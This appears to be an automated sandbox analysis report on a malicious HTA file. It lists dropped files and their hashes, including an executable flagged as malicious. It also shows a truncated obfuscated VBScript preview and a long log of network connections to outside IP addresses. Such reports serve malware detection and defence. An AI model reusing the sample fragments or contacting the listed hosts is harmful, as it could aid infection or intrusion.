Preview:	@...e...................8...Z.P.......X..............@..........H...............o..b~.D.poM...%..... .Microsoft.PowerShell.ConsoleHostD...............E...y.BG.\......R.......System.Management.Automation4...............<."..Ke@...j..........System.Core.0.................Vn.F..kLsw..........System..4.................%...K... ...u.......System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4..................~..2K..}...0........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wk5itrej.ll4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xx5dca4z.5a2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\sxnoX.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1483040
Entropy (8bit):	7.1086567834462695
Encrypted:	false
SSDEEP:	24576:MNbP9SNg9nmKu2HhIYjAY6RTVSTPkSnexozZTQAvTWjYIZTbRFPUN0gLuweIDak:6TRnU4/FQAiFxfPkao
MD5:	47E88C8E89C1E99CA76EC3D8BAB8C3D8
SHA1:	2EB0D2AD0730ADACA7A4A8DD32715CD4B3809721
SHA-256:	13D499124F676B7D0E326C36A6AF6D9968E8EB6B66F98FCEFB166EAE22149B7C
SHA-512:	7ACDE2C6713B70E2344BE2A5F76D1867DA8CE30BF9A90AFB9044B6D65FFEE1580E7E18722DD7960304EF583F16833B6CFB62FC648487F076F394401C25AB2FC5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: client_3.vbs, Detection: malicious, Browse
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......d.................Z..........&.............@..................................#....@.................................h...........@............J.. W...0...................................... ...............l...P............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....@..........................@....00cfg.......P......................@..@.tls.........`......................@....voltbl......p...........................rsrc...@...........................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (18929), with CRLF line terminators
Entropy (8bit):	4.375773302972388
TrID:	HyperText Markup Language (6006/1) 100.00%
File name:	client_1.hta
File size:	23'545 bytes
MD5:	57d3eb665f1e9e6a19f278baabd49e7b
SHA1:	44566a9d716e6abd0304544dd88d245fea990882
SHA256:	4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d
SHA512:	30a0a3349aa0b815728abdb0c770d65354cdcf68ca939de4c175bdb285e3d664d7afdddc4be91bae170a65e4f808e6de7cc877fa36442f64f7b7db993e83851d
SSDEEP:	384:rO6BO5aa8mOFhyS1q5H8qxAt4VFhmqmfW9PW6vN1v35Zh5LaBY5E6bqBdOfF:4zS0kPWVN5LbtcOfF
TLSH:	16B26B6D034FA8FC9673ACC88AD5AC53FB7587264A6CDAC49F30BEEA2410174A4F551C
File Content Preview:	<html><head><script language="vbscript">..vtlQveqCLtsucXtVfyBmntNVrfdfTuQSrvuS = array(208, 189, 150, 180, 195, 196, 187, 179, 109, 225, 187, 216, 225, 221, 173, 121, 230, 222, 217, 186, 91, 131, 150, 184, 220, 150, 154, 158, 184, 129, 125, 116, 203, 216,

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 5, 2023 18:47:56.899545908 CEST	49692	80	192.168.2.3	172.67.177.73
Oct 5, 2023 18:47:57.049058914 CEST	80	49692	172.67.177.73	192.168.2.3
Oct 5, 2023 18:47:57.049210072 CEST	49692	80	192.168.2.3	172.67.177.73
Oct 5, 2023 18:47:57.049932957 CEST	49692	80	192.168.2.3	172.67.177.73
Oct 5, 2023 18:47:57.199856043 CEST	80	49692	172.67.177.73	192.168.2.3
Oct 5, 2023 18:47:57.586942911 CEST	80	49692	172.67.177.73	192.168.2.3
Oct 5, 2023 18:47:57.586971045 CEST	80	49692	172.67.177.73	192.168.2.3
Oct 5, 2023 18:47:57.587069035 CEST	49692	80	192.168.2.3	172.67.177.73
Oct 5, 2023 18:47:58.265094995 CEST	49693	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:47:58.265135050 CEST	443	49693	93.93.131.124	192.168.2.3
Oct 5, 2023 18:47:58.265198946 CEST	49693	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:47:58.275353909 CEST	49693	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:47:58.275372028 CEST	443	49693	93.93.131.124	192.168.2.3
Oct 5, 2023 18:47:58.839864969 CEST	443	49693	93.93.131.124	192.168.2.3
Oct 5, 2023 18:47:58.839957952 CEST	49693	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:47:58.844933987 CEST	49693	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:47:58.844945908 CEST	443	49693	93.93.131.124	192.168.2.3
Oct 5, 2023 18:47:58.845202923 CEST	443	49693	93.93.131.124	192.168.2.3
Oct 5, 2023 18:47:58.866195917 CEST	49693	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:47:58.906452894 CEST	443	49693	93.93.131.124	192.168.2.3
Oct 5, 2023 18:47:59.378479004 CEST	443	49693	93.93.131.124	192.168.2.3
Oct 5, 2023 18:47:59.378549099 CEST	443	49693	93.93.131.124	192.168.2.3
Oct 5, 2023 18:47:59.378633976 CEST	49693	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:47:59.379820108 CEST	49693	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:47:59.380239010 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:47:59.380285978 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:47:59.380357981 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:47:59.380734921 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:47:59.380757093 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:47:59.967669010 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:47:59.969876051 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:47:59.969907999 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:00.516953945 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:00.517003059 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:00.517237902 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:00.517270088 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:00.561022043 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:00.790755987 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:00.790870905 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:00.790920973 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:00.790971994 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:00.790971994 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:00.790971994 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:00.791008949 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:00.791028976 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:00.791039944 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:00.791086912 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:00.872365952 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:00.872534037 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.065310001 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.065435886 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.065627098 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.065623999 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.065671921 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.065699100 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.065699100 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.066095114 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.066152096 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.066162109 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.066421032 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.066473007 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.066483021 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.103574991 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.103641987 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.103673935 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.146370888 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.146537066 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.146568060 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.201675892 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.339507103 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.339560986 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.339626074 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.339672089 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.339687109 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.339745045 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.339975119 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.340042114 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.340114117 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.340169907 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.340676069 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.340737104 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.341061115 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.341129065 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.341491938 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.341555119 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.341856956 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.341916084 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.342470884 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.342535973 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.342787981 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.342853069 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.343199968 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.343261957 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.377510071 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.377625942 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.420003891 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.420083046 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.420084000 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.420114040 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.420134068 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.420157909 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.613389969 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.613631010 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.613688946 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.613728046 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.613756895 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.613785028 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.614012957 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.614083052 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.614523888 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.614603043 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.614847898 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.614911079 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.615155935 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.615214109 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.615648985 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.615725040 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.616019011 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.616086006 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.616533041 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.616601944 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.616728067 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.616780996 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.617237091 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.617295980 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.617700100 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.617754936 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.617958069 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.618016958 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.618366003 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.618417978 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.618648052 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.618709087 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.619168043 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.619225025 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.619420052 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.619476080 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.619971037 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.620028019 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.620352983 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.620410919 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.620721102 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.620778084 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.621120930 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.621176004 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.621587038 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.621645927 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.651047945 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.651104927 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.651119947 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.651128054 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.651146889 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.651189089 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.651381969 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.651436090 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.693747044 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.693830013 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.694011927 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.694076061 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.736427069 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.736614943 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.887259007 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.887351036 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.887381077 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.887437105 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.887454987 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.887479067 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.887705088 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.887772083 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.888004065 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.888067961 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.888452053 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.888511896 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.888771057 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.888828993 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.889316082 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.889483929 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.889698982 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.889764071 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.890136957 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.890198946 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.890595913 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.890650988 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.890820026 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.890878916 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.891180038 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.891237974 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.891706944 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.891766071 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.892069101 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.892132998 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.892395020 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.892452955 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.892812967 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.892865896 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.893343925 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.893400908 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.893629074 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.893687963 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.893964052 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.894013882 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.894313097 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.894365072 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.894659996 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.894716024 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.895292997 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.895356894 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.895539999 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.895592928 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.895910025 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.895967960 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.896408081 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.896470070 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.896899939 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.896953106 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.897242069 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.897296906 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.897505999 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.897562027 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.897860050 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.897914886 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.898403883 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.898462057 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.898994923 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.899044991 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.899235964 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.899297953 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.899534941 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.899594069 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.899962902 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.900012970 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.900343895 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.900403023 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.900712967 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.900765896 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.901041985 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.901101112 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.901487112 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.901566982 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.901870012 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.901928902 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.902337074 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.902390957 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.902857065 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.902906895 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.903203964 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.903258085 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.903359890 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.903410912 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.903879881 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.903934002 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.924727917 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.924886942 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.925081015 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.925152063 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.925326109 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.925394058 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.925682068 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.925756931 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.926420927 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.926484108 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.968718052 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.968867064 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.968929052 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.969010115 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.969038963 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.969098091 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.969314098 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.969381094 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.969794035 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.969866991 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:01.969971895 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:01.970033884 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.010119915 CEST	443	49694	93.93.131.124	192.168.2.3
